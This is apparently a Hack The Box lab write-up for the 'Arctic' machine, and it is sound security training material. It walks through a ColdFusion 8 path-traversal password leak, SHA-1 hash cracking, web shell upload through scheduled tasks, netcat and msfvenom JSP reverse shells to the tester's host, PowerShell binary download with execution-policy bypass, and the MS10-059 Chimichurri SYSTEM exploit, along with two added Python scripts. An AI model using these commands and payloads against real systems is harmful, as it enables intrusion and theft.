Arctic
Ports scanning
root@kali:~/HTB/Machines/Arctic# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.11 --rate=1000
Starting masscan 1.0.5 at 2019-11-16 04:02:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 8500/tcp on 10.10.10.11
Discovered open port 49154/tcp on 10.10.10.11
Discovered open port 135/tcp on 10.10.10.11
root@kali:~/HTB/Machines/Arctic# nmap -sC -sV -p135,8500,49154 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-15 23:06 EST
Nmap scan report for arctic.htb (10.10.10.11)
Host is up (0.044s latency).

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
ColdFusion
Port 8500, which nmap could not fingerprint (fmtp?), actually speaks HTTP: it is the built-in web server of a ColdFusion installation.
Browsing the server, we find the ColdFusion administrator login page at:
http://10.10.10.11:8500/CFIDE/administrator/
LFI
The administrator login page is vulnerable to directory traversal through its locale parameter (the ColdFusion 8 issue tracked as CVE-2010-2861). The %00 terminates the path, so whatever the application appends after it is discarded, and the request returns the file password.properties:
http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
The password is stored as an unsalted SHA-1 hash, which can be looked up in seconds on crackstation.net.
https://crackstation.net/
Hash                                      Type  Result
2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03  sha1  happyday
With the password, we have full access to the ColdFusion Administrator console.
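The crackstation lookup above works because the digest is a bare SHA-1 with no salt and no work factor: one hash per candidate is all an attacker needs, and a precomputed table answers for every ColdFusion 8 install in the world. As an added example that is not part of the original write-up, the script below parses a password.properties file in the layout ColdFusion 8 uses and runs the same attack offline against the hash from the write-up. The properties text and the wordlist are constructed for the example; only the hash value comes from the page.

```python
"""Added example (not from the original write-up): parse a ColdFusion 8
password.properties file and dictionary-attack the unsalted SHA-1 it stores."""
import hashlib
import re

# Constructed sample in the Java .properties layout ColdFusion 8 uses for the
# administrator password. The 'password' value is the hash shown in the write-up.
SAMPLE_PROPERTIES = """\
#ColdFusion 8 administrator password (constructed sample)
password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
encrypted=true
"""

# Constructed wordlist: a handful of guesses, including the one that cracks it.
WORDLIST = ["password", "admin", "coldfusion", "Password1", "happyday", "arctic"]


def parse_properties(text):
    """Minimal Java .properties parser: skip blank and comment lines, split on the first '='."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def looks_like_sha1(value):
    """40 hex digits with no salt field and no iteration count: a bare SHA-1 digest."""
    return re.fullmatch(r"[0-9A-Fa-f]{40}", value) is not None


def crack_unsalted_sha1(target_hex, wordlist):
    """One SHA-1 per candidate; returns the matching word or None.

    Without a salt every install sharing a password shares a hash, so a single
    precomputed table (what crackstation holds) covers all of them."""
    target = target_hex.upper()
    for word in wordlist:
        if hashlib.sha1(word.encode("utf-8")).hexdigest().upper() == target:
            return word
    return None


def recover_admin_password(properties_text, wordlist):
    """Confirm the file stores a hash rather than a cleartext value, then attack it."""
    props = parse_properties(properties_text)
    if props.get("encrypted", "false").lower() != "true":
        return props.get("password")  # stored in clear; nothing to crack
    digest = props["password"]
    if not looks_like_sha1(digest):
        raise ValueError("unexpected hash format: %r" % digest)
    return crack_unsalted_sha1(digest, wordlist)


if __name__ == "__main__":
    print(recover_admin_password(SAMPLE_PROPERTIES, WORDLIST))
```

Point the same functions at the real file fetched through the LFI and at a proper wordlist (rockyou or similar) and the loop is the whole attack; a salted, iterated hash (PBKDF2 or bcrypt) would force one expensive computation per candidate per account instead.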
Download backdoor script
Download the cfm backdoor script from fuzzdb.
root@kali:~/HTB/Machines/Arctic# wget https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/web-backdoors/cfm/cfExec.cfm
--2019-11-16 00:54:10--  https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/web-backdoors/cfm/cfExec.cfm
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.204.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.204.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2187 (2.1K) [text/plain]
Saving to: ‘cfExec.cfm’

cfExec.cfm          100%[=============================================>]   2.14K  --.-KB/s    in 0s

2019-11-16 00:54:10 (14.5 MB/s) - ‘cfExec.cfm’ saved [2187/2187]
Start a local web server
root@kali:~/HTB/Machines/Arctic# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Create a download scheduled task
In the ColdFusion Administrator, Scheduled Tasks lets a task fetch a URL and save the response to a file on disk (the publish option). We point the URL at our web server (http://10.10.14.34/cfExec.cfm) and the output file at the web root (c:\Coldfusion8\wwwroot\cfExec.cfm), so the web shell becomes reachable at http://10.10.10.11:8500/cfExec.cfm.
Upload the webshell
We watch the Python web server log until the target requests the file.
root@kali:~/HTB/Machines/Arctic# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.11 - - [16/Nov/2019 01:11:03] "GET /cfExec.cfm HTTP/1.1" 200 -
If we browse the application, we see our file in the root of the webserver.
User flag
Command: c:\windows\system32\cmd.exe Options: /c type c:\Users\tolis\Desktop\user.txt > c:\Coldfusion8\wwwroot\user.txt
root@kali:~/HTB/Machines/Arctic# wget http://10.10.10.11:8500/user.txt
--2019-11-16 01:51:03--  http://10.10.10.11:8500/user.txt
Connecting to 10.10.10.11:8500... connected.
HTTP request sent, awaiting response... 200 OK
Length: 32 [text/plain]
Saving to: ‘user.txt’

user.txt            100%[===========================================>]      32  --.-KB/s    in 0s

2019-11-16 01:51:20 (1.69 MB/s) - ‘user.txt’ saved [32/32]

root@kali:~/HTB/Machines/Arctic# cat user.txt
<USER FLAG>
Reverse shell with netcat
On the web server, nc.exe is fetched through another scheduled task, the same way as cfExec.cfm:
root@kali:~/HTB/Machines/Arctic# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.11 - - [16/Nov/2019 01:11:03] "GET /cfExec.cfm HTTP/1.1" 200 -
10.10.10.11 - - [16/Nov/2019 01:29:54] "GET /nc.exe HTTP/1.1" 200 -
Run nc listener
root@kali:~/HTB/Machines/Arctic# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Launch command
Command: c:\windows\system32\cmd.exe Options: /c c:\Coldfusion8\wwwroot\nc.exe 10.10.14.34 4444 -e c:\windows\system32\cmd.exe
But it doesn't work :(
JSP reverse shell
The administrator's system summary shows that ColdFusion runs on Java, so I try a JSP reverse shell.
Upload the jsp file with a scheduled task.
URL: http://10.10.14.34/jsp-reverse.jsp
File: c:\Coldfusion8\wwwroot\CFIDE\jsp-reverse.jsp
Launch URL
Opening http://10.10.10.11:8500/jsp-reverse.jsp in the browser gives an HTTP 500 error :(
Second JSP reverse shell
This time the reverse shell is generated with msfvenom, with the connection parameters hard-coded instead of taken from a form.
root@kali:~/HTB/Machines/Arctic# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.34 LPORT=4444 > rs.jsp
Payload size: 1497 bytes
Upload the rs.jsp
We use the task scheduler to push the file.
URL: http://10.10.14.34/rs.jsp
File: c:\Coldfusion8\wwwroot\rs.jsp
Request rs.jsp to trigger it
root@kali:~/HTB/Machines/Arctic/work# wget http://10.10.10.11:8500/rs.jsp
--2019-11-16 02:52:25--  http://10.10.10.11:8500/rs.jsp
Connecting to 10.10.10.11:8500... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘rs.jsp’

rs.jsp                  [ <=>                                          ]       8  --.-KB/s    in 0s

2019-11-16 02:52:42 (436 KB/s) - ‘rs.jsp’ saved [8]
And in the listener, the shell opens
root@kali:~/HTB/Machines/Arctic# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.11.
Ncat: Connection from 10.10.10.11:49867.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\ColdFusion8\runtime\bin>
Privilege escalation
systeminfo
C:\ColdFusion8\runtime\bin>systeminfo
...
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
...
Hotfix(s):                 N/A
The server is Windows Server 2008 R2, build 7600, without a single hotfix installed, so an old local privilege escalation exploit is likely to work.
Upload exploit MS10-059
Download the compiled exploit.
root@kali:~/HTB/Machines/Arctic# wget https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe
--2019-11-16 03:18:15--  https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe
Resolving github.com (github.com)... 140.82.113.4
Connecting to github.com (github.com)|140.82.113.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/egre55/windows-kernel-exploits/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe [following]
--2019-11-16 03:18:15--  https://raw.githubusercontent.com/egre55/windows-kernel-exploits/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.32.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.32.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 784384 (766K) [application/octet-stream]
Saving to: ‘Chimichurri.exe’

Chimichurri.exe     100%[===========================================>] 766.00K  --.-KB/s    in 0.1s

2019-11-16 03:18:15 (7.70 MB/s) - ‘Chimichurri.exe’ saved [784384/784384]
We upload the exploit with a new scheduled task.
URL: http://10.10.14.34/Chimichurri.exe
File: c:\Coldfusion8\wwwroot\Chimichurri.exe
Open a new listener
root@kali:~/HTB/Machines/Arctic# nc -nvlp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Run exploit
C:\ColdFusion8\wwwroot>Chimichurri.exe Chimichurri.exe
It does not work. After nc.exe, this is the second executable pushed through the scheduled task that fails to run.
Analyze executable files
The copies on the target do not have the same size as the originals. I download them back from the web root to compare them.
root@kali:~/HTB/Machines/Arctic# mkdir work
root@kali:~/HTB/Machines/Arctic# cd work/
root@kali:~/HTB/Machines/Arctic/work# wget -q 10.10.10.11:8500/nc.exe
root@kali:~/HTB/Machines/Arctic/work# wget -q 10.10.10.11:8500/41020.exe
root@kali:~/HTB/Machines/Arctic/work# wget -q 10.10.10.11:8500/Chimichurri.exe
When I try to execute the downloaded copies locally, they do not work either.
root@kali:~/HTB/Machines/Arctic/work# diff -y -W 139 --suppress-common-lines <(xxd 41020.exe) <(xxd ../41020.exe) | head -n 5
00000000: 4d5a 3f00 0300 0000 0400 0000 3f3f 0000  MZ?.........??..   | 00000000: 4d5a 9000 0300 0000 0400 0000 ffff 0000  MZ..............
00000150: 0000 0000 0300 603f 0000 1000 0000 0000  ......`?........   | 00000150: 0000 0000 0300 6081 0000 1000 0000 0000  ......`.........
000001d0: 3f44 0a00 9400 0000 0000 0000 0000 0000  ?D..............   | 000001d0: 9044 0a00 9400 0000 0000 0000 0000 0000  .D..............
00000200: 2e74 6578 7462 7373 3fe8 0200 0010 0000  .textbss?.......   | 00000200: 2e74 6578 7462 7373 9ce8 0200 0010 0000  .textbss........
00000250: 2e72 6461 7461 0000 3f4f 0100 0070 0900  .rdata..?O...p..   | 00000250: 2e72 6461 7461 0000 9d4f 0100 0070 0900  .rdata...O...p..
Bytes above 0x7f (0x90, 0x81, 0x9c, 0x9d, 0xff in the rows shown) have been replaced by 0x3f, the ASCII question mark, while a few others (0x94, 0xe8) survived. The scheduled task treats the HTTP response as text and re-encodes it in the server's code page, so every byte that is not a valid character there becomes '?'. That explains why nc.exe, jsp-reverse.jsp and the two exploit binaries did not work while cfExec.cfm, which is pure ASCII, came through intact. The scheduled task cannot be used to transfer binary files.
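The five xxd rows above are enough to pin down what happened to the binaries. As an added example that is not part of the original write-up, the script below embeds those rows (constructed from the diff output), reproduces the damage by round-tripping the bytes through a Windows ANSI code page, and reports which byte values were lost and which survived; the check can be run on any served/received pair of files. The code-page identification (Windows-1253, the Greek code page, which is the only common one whose undefined positions are exactly 0x81, 0x90, 0x9c, 0x9d and 0xff while 0x94 and 0xe8 are defined) is my inference from those rows, not something the write-up states.

```python
"""Added example (not from the original write-up): diagnose a text-mode file
transfer that turned bytes undefined in the server's code page into '?'."""
import sys

QUESTION_MARK = 0x3F

# Constructed from the xxd diff in the write-up: (offset, bytes served, bytes received).
DIFF_ROWS = [
    (0x000, "4d5a90000300000004000000ffff0000", "4d5a3f0003000000040000003f3f0000"),
    (0x150, "00000000030060810000100000000000", "000000000300603f0000100000000000"),
    (0x1d0, "90440a00940000000000000000000000", "3f440a00940000000000000000000000"),
    (0x200, "2e746578746273739ce8020000100000", "2e746578746273733fe8020000100000"),
    (0x250, "2e726461746100009d4f010000700900", "2e726461746100003f4f010000700900"),
]
SAMPLE_ORIGINAL = b"".join(bytes.fromhex(o) for _, o, _ in DIFF_ROWS)
SAMPLE_RECEIVED = b"".join(bytes.fromhex(r) for _, _, r in DIFF_ROWS)


def text_mode_roundtrip(data, codepage="cp1253"):
    """Model the transfer: the response is decoded as text in the server's ANSI
    code page (undefined bytes become U+FFFD), then written back out in that same
    code page (U+FFFD is not encodable there and becomes '?')."""
    return data.decode(codepage, errors="replace").encode(codepage, errors="replace")


def compare_copies(original, received):
    """Classify the bytes >= 0x80: which values were turned into '?' and which survived."""
    report = {
        "same_length": len(original) == len(received),
        "lost_values": set(),
        "survived_high_values": set(),
        "other_differences": 0,
    }
    for a, b in zip(original, received):
        if a == b:
            if a >= 0x80:
                report["survived_high_values"].add(a)
        elif a >= 0x80 and b == QUESTION_MARK:
            report["lost_values"].add(a)
        else:
            report["other_differences"] += 1
    return report


def diagnose(original, received):
    """One-line verdict on a served/received pair."""
    if original == received:
        return "intact"
    r = compare_copies(original, received)
    if r["same_length"] and r["other_differences"] == 0 and r["lost_values"]:
        lost = ", ".join("0x%02x" % v for v in sorted(r["lost_values"]))
        return "text-mode transfer: bytes %s replaced by '?'" % lost
    return "corrupted in another way (truncation, CRLF conversion or similar)"


def find_matching_codepages(original, received, candidates=("cp1252", "cp1253", "latin-1")):
    """Return the code pages whose round-trip reproduces the received bytes exactly."""
    return [cp for cp in candidates if text_mode_roundtrip(original, cp) == received]


def survives_text_mode(data):
    """7-bit ASCII payloads round-trip unchanged in every ANSI code page
    (this is why the cfExec.cfm web shell worked and the .exe files did not)."""
    return all(b < 0x80 for b in data)


def rows_reproduced(codepage="cp1253"):
    """True when the round-trip model reproduces every row of the diff."""
    return all(text_mode_roundtrip(bytes.fromhex(o), codepage) == bytes.fromhex(r)
               for _, o, r in DIFF_ROWS)


if __name__ == "__main__":
    if len(sys.argv) == 3:  # usage: script.py served.bin received.bin
        with open(sys.argv[1], "rb") as f1, open(sys.argv[2], "rb") as f2:
            original, received = f1.read(), f2.read()
    else:
        original, received = SAMPLE_ORIGINAL, SAMPLE_RECEIVED
    print(diagnose(original, received))
    print("code pages reproducing the damage:", find_matching_codepages(original, received))
```

Because the damage is lossy (several byte values collapse into one '?'), nothing can repair the received copy; the only fix is a transfer path that never treats the payload as text, which is what the PowerShell WebClient download in the next section provides.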
Download file using powershell
Make sure the web server is still running
root@kali:~/HTB/Machines/Arctic# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
And from the reverse shell
C:\ColdFusion8\wwwroot>echo $webclient = New-Object System.Net.WebClient > download.ps1 echo $webclient = New-Object System.Net.WebClient > download.ps1
C:\ColdFusion8\wwwroot>echo $webclient.DownloadFile("http://10.10.14.34/Chimichurri.exe","Chimichurri.exe") >> download.ps1 echo $webclient.DownloadFile("http://10.10.14.34/Chimichurri.exe","Chimichurri.exe") >> download.ps1
C:\ColdFusion8\wwwroot>powershell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile -NonInteractive -File download.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NoProfile -NonInteractive -File download.ps1
The request shows up in the web server log
root@kali:~/HTB/Machines/Arctic# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.11 - - [16/Nov/2019 22:46:26] "GET /Chimichurri.exe HTTP/1.1" 200 -
And this time the file has the correct size (784384 bytes, the same as the original).
C:\ColdFusion8\wwwroot>dir Chimichurri.exe
dir Chimichurri.exe
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\ColdFusion8\wwwroot

18/11/2019  01:44           784.384 Chimichurri.exe
               1 File(s)        784.384 bytes
               0 Dir(s)  33.180.762.112 bytes free
A shorter command line for the same download
The IEX/DownloadString idiom is for running a script in memory, not for saving a binary; to write the file to disk, call DownloadFile directly:
powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "(New-Object Net.WebClient).DownloadFile('http://10.10.14.34/Chimichurri.exe','Chimichurri.exe')"
Open a new listener
root@kali:~/HTB/Machines/Arctic# nc -nvlp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Run the exploit
C:\ColdFusion8\wwwroot>Chimichurri
Chimichurri
/Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Usage: Chimichurri.exe ipaddress port
C:\ColdFusion8\wwwroot>Chimichurri 10.10.14.34 5555
Chimichurri 10.10.14.34 5555
/Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Changing registry values...
/Chimichurri/-->Got SYSTEM token...
/Chimichurri/-->Running reverse shell...
/Chimichurri/-->Restoring default registry values...
Administrator reverse shell
root@kali:~/HTB/Machines/Arctic# nc -nvlp 5555
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on 0.0.0.0:5555
Ncat: Connection from 10.10.10.11.
Ncat: Connection from 10.10.10.11:54699.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\ColdFusion8\wwwroot>whoami
whoami
nt authority\system
Root flag
C:\ColdFusion8\wwwroot>cd .. cd ..
C:\ColdFusion8>cd .. cd ..
C:\>cd Users cd Users
C:\Users>cd Administrator cd Administrator
C:\Users\Administrator>cd Desktop cd Desktop
C:\Users\Administrator\Desktop>type root.txt type root.txt <ROOT FLAG>
References
- egre55/windows-kernel-exploits
- Microsoft Security Bulletin MS10-059 - Important
- 3 ways to download files with PowerShell
Daniel Simao 00:24, 16 November 2019 (EST)